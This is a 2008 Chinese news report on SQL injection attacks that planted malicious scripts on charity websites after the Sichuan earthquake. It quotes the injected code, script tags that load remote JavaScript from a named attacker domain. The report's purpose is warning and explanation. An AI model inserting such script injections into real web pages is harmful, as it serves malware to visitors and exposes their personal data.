資訊安全再陷危機 慈善團體網站受害最甚 隱碼攻擊為主因
外觀
【2008年5月21日訊】
四川大地震衍伸出的問題,在各領域上屢見不鮮,不只觀光業,就連救災、慈善相關的網站,近期也被駭客鎖定為主要的攻擊目標,當中,「SQL隱碼攻擊」是主要關鍵。
趨勢科技指出,因為四川大地震的關係,使得眾多慈善團體的網站,點閱率大幅提升,也大幅增加犯罪者植入木馬的機會,駭客更利用微軟在兩年前發佈的MS06-14漏洞,進行入侵攻擊,一旦使用者連上被入侵的網站,點選外部連結後,其他相關網站也會遭到攻擊,目前所知,亞洲地區有近十萬以上的網站遭波及。
另外,阿瑪科技根據近期受害的亞洲網站進行分析,當中,更指出,只要在大型搜尋引擎,輸入駭客指令的關鍵字,就可以看到眾多網站會被植入包含「<script>」的程式語法,範例如下:
“
<script src=http:/<script src=http://9i5t.cn/a.js></script>
<script src=http://9i5t.cn/a.js></script>
”
此類攻擊手段,是駭客先入侵伺服器端,找到注入點,之後讓受害的網站,在無意間與駭客端連結,而當使用者連上線後,個人資料隨即遭到駭客的竊取,造成個資外洩的嚴重問題。
雖然受害的網站已有部分修復完畢,但台灣資安產業已發出警示,提醒使用者搜尋網站時,除了注意安全警示標與外,並儘量不要連入庫存網站頁面,以免遭受攻擊。
消息來源
- 趨勢:10萬中文網頁遭入侵 鎖定公益網站,ZDNet,2008年5月19日。
- 何宏儒,強震消息成攻擊工具 10萬中文網頁昨遭駭,中央通訊社,2008年5月19日。
- 新聞稿:台灣網站遭受有史以來最大量 SQL Injection 攻擊,阿瑪科技,2008年5月20日。
- 十萬中文網頁遭惡意程式攻擊 上網捐款要小心,Global Sources,2008年5月21日。[已失效,有存檔]
外部連結
- 微軟的MS06-14資訊安全特報(英文)